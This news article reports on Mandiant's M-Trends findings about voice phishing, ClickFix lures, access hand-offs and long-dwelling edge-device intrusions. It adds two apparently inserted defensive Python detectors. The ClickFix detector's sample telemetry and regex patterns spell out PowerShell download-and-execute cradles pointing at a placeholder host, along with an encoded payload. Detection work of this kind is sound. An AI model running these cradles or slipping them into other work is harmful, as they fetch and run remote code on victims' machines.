Smooth criminals talking their way into cloud environments, Google says

Voice phishing surged last year to become the second most common method used by cybercriminals to gain initial access to their victims' IT estate – and the No. 1 tactic used when breaking into cloud environments.

Groups like ShinyHunters and Scattered Lapsus$ Hunters increasingly used this and other interactive social engineering tactics, in which a human steers the conversation in real time, in their 2025 attacks, according to Jurgen Kutscher, VP of Mandiant Consulting at Google Cloud.

"It's the interactive ones, the voice based ones, that are really creating a new challenge," he told The Register in an interview about the security shop's annual M-Trends report, based on data collected from Mandiant's more than 500,000 hours of incident response engagements conducted around the world last year.

The report found attackers used voice-based phishing as the initial infection vector in 11 percent of attacks last year, making it the second-most common method of gaining illicit access to systems. Exploiting vulnerabilities topped the charts for a sixth year, accounting for 32 percent of successful attacks.

Non-interactive lures such as phishing emails, however, declined, accounting for just six percent of 2025 intrusions.

"What we've seen in 2025 is certain threat actors calling IT help desks to, for example, register attacker-controlled devices for MFA to try and reset passwords," Kutscher said. "They're building a number of different scenarios to trick IT help desks, and an IT help desk, by default, tries to help. That's part of the reason why the social engineering attacks that are interactive are so powerful."
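The help-desk scenario Kutscher describes leaves a recognisable trail in identity-provider audit logs. The following is an added example, not Mandiant's or Google's code: it correlates constructed audit events (the field names, action names and IP addresses are assumptions; map them onto your own IdP's audit schema) and flags a help-desk password reset that is followed within minutes by a new MFA method registered for the same user from a network the user had never signed in from.

```python
"""Correlate help-desk password resets with MFA device registrations.

Added example, not code from the M-Trends report. Field names, action names
and addresses below are assumptions over a constructed audit-log sample.
"""
from datetime import datetime, timedelta

# Constructed sample audit events (UTC). Order does not matter; they are sorted.
EVENTS = [
    {"ts": "2025-06-02T09:01:10", "user": "jdoe", "actor": "jdoe", "action": "login", "ip": "203.0.113.10"},
    {"ts": "2025-06-02T13:12:00", "user": "jdoe", "actor": "helpdesk-01", "action": "password_reset", "ip": "198.51.100.5"},
    {"ts": "2025-06-02T13:13:30", "user": "jdoe", "actor": "jdoe", "action": "mfa_method_added", "ip": "192.0.2.77", "method": "authenticator_app"},
    {"ts": "2025-06-02T13:14:05", "user": "jdoe", "actor": "jdoe", "action": "login", "ip": "192.0.2.77"},
    {"ts": "2025-05-20T08:00:00", "user": "asmith", "actor": "asmith", "action": "login", "ip": "203.0.113.22"},
    {"ts": "2025-06-02T10:00:00", "user": "asmith", "actor": "helpdesk-02", "action": "password_reset", "ip": "198.51.100.5"},
    {"ts": "2025-06-03T15:30:00", "user": "asmith", "actor": "asmith", "action": "mfa_method_added", "ip": "203.0.113.22", "method": "authenticator_app"},
]


def _sorted_events(events):
    """Parse ISO timestamps and order events oldest first."""
    parsed = [dict(e, ts=datetime.fromisoformat(e["ts"])) for e in events]
    return sorted(parsed, key=lambda e: e["ts"])


def find_helpdesk_takeovers(events, window=timedelta(minutes=30)):
    """Return one alert per help-desk reset followed by MFA enrolment inside `window`."""
    evs = _sorted_events(events)
    alerts = []
    for i, reset in enumerate(evs):
        # Only resets performed by someone other than the account owner
        # (self-service resets are a different detection).
        if reset["action"] != "password_reset" or reset["actor"] == reset["user"]:
            continue
        user = reset["user"]
        # Networks the user had signed in from before the reset.
        known_ips = {e["ip"] for e in evs[:i] if e["user"] == user and e["actor"] == user}
        for later in evs[i + 1:]:
            if later["ts"] - reset["ts"] > window:
                break  # events are sorted, so nothing later can be inside the window
            if later["user"] != user or later["action"] != "mfa_method_added":
                continue
            seen = later["ip"] in known_ips
            alerts.append({
                "user": user,
                "reset_by": reset["actor"],
                "seconds_after_reset": int((later["ts"] - reset["ts"]).total_seconds()),
                "mfa_method": later.get("method"),
                "mfa_ip": later["ip"],
                "ip_seen_before": seen,
                # Enrolment from an unknown network right after a help-desk reset
                # matches the attacker-controlled-device pattern; the same network
                # is more likely a genuine user who lost their phone.
                "severity": "medium" if seen else "high",
            })
    return alerts


if __name__ == "__main__":
    for alert in find_helpdesk_takeovers(EVENTS):
        print(alert)
```

On the sample, jdoe's enrolment 90 seconds after a help-desk reset from a never-seen address is raised as high; asmith's enrolment a day later from a known address is not raised at all. The window and the "seen before" check are the two knobs worth tuning against your own reset volumes.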

Don't click the 'fix'

Scammers aren't only targeting IT help desks with interactive social engineering: Google, along with other security researchers, also documented a spike in ClickFix attacks over the past year.

ClickFix is an extremely popular social engineering tactic in which attackers trick users into running malicious commands on their own computers, usually by presenting what looks like a fix for a computer problem or an "I am not a robot" verification prompt; the "fix" is typically a command the victim is walked through pasting into the Windows Run dialog or a terminal.

Google's threat-intelligence arm documented "dozens" of criminal groups using this technique last year, especially threat clusters focused on widespread initial access operations.
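Because the victim launches the command themselves, the most reliable place to catch ClickFix is process-creation telemetry rather than the lure page. The block below is an added example, not code from Google or Mandiant: it scores constructed Sysmon-style process-creation records (field names are assumptions) for the combination these lures produce, a shell started from the Run box or a browser with a hidden window, an execution-policy bypass, and an encoded or downloaded payload. It also decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE text) so that a download cradle hidden inside it is scored as well.

```python
"""Score process-creation events for ClickFix-style command execution.

Added example, not Google's or Mandiant's detection logic. The record shape,
the sample events and the scoring weights are assumptions.
"""
import base64
import re

# Parents a pasted ClickFix command is typically launched from: explorer.exe
# (Win+R Run box, File Explorer address bar) or a browser.
PASTE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Interpreters and download helpers the lures abuse.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "wscript.exe"}

# Each indicator scores once per event, whether it appears in the raw command
# line or inside the decoded -EncodedCommand payload.
INDICATORS = [
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden"),
    ("exec_bypass", r"-(?:ep|executionpolicy)\s+bypass"),
    ("no_profile", r"-nop\b|-noprofile\b"),
    ("download_cradle", r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient|"
                        r"invoke-expression|\biex\b|curl(?:\.exe)?\s+https?://"),
    ("remote_hta", r"mshta(?:\.exe)?\s+https?://"),
    ("clipboard", r"get-clipboard"),
]
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or '' if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, hits, decoded_payload) for one process-creation record."""
    score, hits = 0, []
    if _basename(ev["ParentImage"]) in PASTE_PARENTS:
        score += 2
        hits.append("parent_is_runbox_or_browser")
    if _basename(ev["Image"]) in LOLBINS:
        score += 1
        hits.append("lolbin")
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded:
        score += 1
        hits.append("encoded_command")
    haystack = ev["CommandLine"] + "\n" + decoded
    for name, pattern in INDICATORS:
        if re.search(pattern, haystack, re.I):
            score += 1
            hits.append(name)
    return score, hits, decoded


def find_clickfix(events, threshold=4):
    """Return the events whose score reaches `threshold`, with the evidence."""
    out = []
    for i, ev in enumerate(events):
        score, hits, decoded = score_event(ev)
        if score >= threshold:
            out.append({"index": i, "score": score, "hits": hits, "decoded": decoded})
    return out


# Constructed sample telemetry (not real events). The encoded payload is built
# here so the sample is self-contained.
_PAYLOAD = "$c=New-Object Net.WebClient;$c.DownloadString('https://example.invalid/a.ps1')|iex"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": 'powershell.exe -w hidden -nop -ep bypass -c "iwr https://example.invalid/fix.ps1 | iex"'},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "Image": _PS,
     "CommandLine": f"powershell -nop -w hidden -enc {_ENC}"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": _PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/verify.hta"},
]

if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print(hit["index"], hit["score"], hit["hits"])
```

On the sample, the two PowerShell lures and the remote HTA launch are flagged, while a scheduled backup script run under services.exe and an `ipconfig` typed into the Run box stay below the threshold. The weight on the parent process is deliberate: a hidden-window PowerShell spawned by an admin tool is routine, the same thing spawned by a browser or the Run box rarely is.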

"We see the threat actors being extremely creative in these types of attacks," Kutscher said. "And they're doing this by directly establishing interactive contact with victims, which is a new level of sophistication. But the return clearly justifies the investment."

Extreme timelines

Another trend highlighted in the 102-page report involves "extremes" in the attackers' timelines, according to Kutscher.

Mandiant's investigations show an increasing number of what it calls "hand-offs," in which one individual or crew gains initial access and then hands that access to a second threat group, typically a ransomware or data theft and extortion gang. Oftentimes this hand-off happens in under 30 seconds.

"And then on the other end of the spectrum, you have, this extreme level of sophistication of stealth that threat actors have gained" that allows them to remain hidden in victims' environments without being detected, sometimes for hundreds of days, Kutscher said.

Attackers on this end of the spectrum – typically espionage groups and North Korean scam IT workers – do this by targeting network edge devices like firewalls, routers, and VPNs, generally by exploiting zero-day bugs. Operators of edge devices often can't or don't protect them with endpoint security products, so malicious code running on those machines tends to evade defenders. Miscreants can therefore stay hidden while they go about their evil business.

Kutscher calls this trend "living on the edge," and first started talking about it two years ago. "What is interesting is the evolution of how they're leveraging these edge devices," he told us.

Miscreants are no longer just using the edge device for access into IT environments. "Now they're also leveraging the core functionalities available on these edge devices, and living on these edge devices, intercepting network traffic, being able to intercept clear-text passwords, etc," Kutscher said.

In some cases, this means the attackers don't even need to move onto the internal network because they are able to steal secrets and other sensitive data from the edge device itself.

"That is an extremely powerful persistence mechanism, and why we've seen now some threat actors with dwell times of 400 days, and the median dwell time going from 11 to 14 days," Kutscher said.

Remember Brickstorm?

Mandiant investigated "numerous" incidents in 2025 in which a suspected Chinese government spy crew tracked as UNC6201 broke into edge devices that didn't support endpoint security products, deployed a backdoor called Brickstorm to maintain long-term access, and captured valid credentials from its position on the appliance. The snoops then used these credentials to access victims' VMware environments.

They remained undetected, on average, for 393 days.

These scenarios challenge network infosec teams. The exceedingly short hand-off time from initial access to ransomware infections, for example, means defenders must "operate at machine speed," Kutscher said. "When an attack life cycle takes place in seconds, human speed is probably not going to be sufficient to stop these types of attacks."

Of course, Google, a security and AI vendor, has a whole suite of products it would like to sell you to help with that.

"You also have to realize that a low-impact incident may turn into a high-impact incident within seconds," Kutscher said. "From an investigative perspective, you can no longer just classify something as low-impact and dismiss it for later. You have to look at all of these events and understand what could be a stage-one attack and could lead to a potential catastrophic consequence for the enterprise." ®

https://go.theregister.com/feed/www.theregister.com/2026/03/23/voice_phishing_skyrockets_as_smooth/